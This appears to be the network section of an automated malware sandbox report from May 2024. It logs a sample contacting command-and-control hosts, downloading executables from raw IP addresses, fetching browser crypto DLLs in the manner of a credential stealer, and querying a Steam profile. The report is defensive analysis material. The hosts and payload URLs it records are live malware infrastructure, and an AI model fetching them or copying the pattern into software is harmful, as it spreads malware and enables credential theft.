Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kyidhbcjdpvriid.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 342Host: dbfhns.in
Source: global traffic HTTP traffic detected: GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.202.233.231
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cqkwdxujhjkjfbp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ahlpadnysdsadbk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mqdfdnedidrxaed.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mdrbuklfbrraj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xmvygvmqskvs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://efeegeullncj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 290Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bduckycvwfnemtxt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ejfrahknvjij.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 224Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qmlyvkkabycy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 251Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ddteakwbikxqkc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ovxmwniqpjexkcks.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 127Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qvvhbwqetcr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://umfomwabnghpfpsy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 206Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://frlbymqtkyyc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bmuwkpviysjlmpaf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://olwhnfqjomykugd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sgvkxotchkel.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 216Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oosdileuucnskppc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://caudwrxwdlvda.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: dbfhns.in
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC9CC60 PR_Recv, 9_2_6CC9CC60
Source: global traffic HTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqls.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /file/update.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 45.129.96.86
Source: global traffic HTTP traffic detected: GET /pintxi1lv.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 23.145.40.124
Source: global traffic HTTP traffic detected: GET /file/host_so.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.235.137.54
Source: global traffic HTTP traffic detected: GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 91.202.233.231
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: dbfhns.in
Source: global traffic DNS traffic detected: DNS query: whispedwoodmoodsksl.shop
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:30:18 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 04 00 00 00 72 e8 85 ec Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:30:19 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:30:21 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:30:22 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:30:23 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:30:26 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2d 5e 24 17 a6 61 44 a2 ae 09 ab c8 ad ac 2b 98 2b 9a ed 33 5e 14 98 8f c1 cb 7c d1 Data Ascii: #\-^$aD++3^|
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:30:28 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:30:30 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:30:31 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:30:32 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2b 58 24 17 a0 6d 44 af a8 09 a2 cc b6 e5 32 9d 20 c1 e0 2a 0b 19 9a c4 8a d6 61 Data Ascii: #\+X$mD2 *a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:30:55 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:30:56 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 20 5a 24 14 a4 6a 44 a9 ab 14 bd cc b1 fb 6d 87 2a d3 ab 77 5f 07 98 d9 8a da 63 c6 2a 1d 01 8b 0a 8c 5e 6e 55 53 b5 91 73 f2 73 ed 44 19 13 Data Ascii: #\ Z$jDm*w_c*^nUSssD
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:31:00 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:32:13 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:32:19 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:32:24 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:32:31 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:32:36 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:32:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:32:50 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:32:54 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:32:59 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:33:06 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:33:11 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:33:16 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:33:22 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:33:27 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:33:32 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:33:39 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:33:45 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:33:51 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: A247.exe, 00000005.00000003.2678333691.0000000000913000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2678080864.0000000000911000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.235.137.54/
Source: A247.exe, 00000005.00000003.2678080864.0000000000911000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.235.137.54/file/host_so.exe
Source: A247.exe, 00000005.00000003.2678080864.0000000000911000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.235.137.54/i
Source: A247.exe, 00000005.00000003.2678333691.0000000000913000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2678080864.0000000000911000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.235.137.54/n
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: explorer.exe, 00000002.00000000.2038509404.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2038509404.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: explorer.exe, 00000002.00000000.2035435817.0000000000F13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
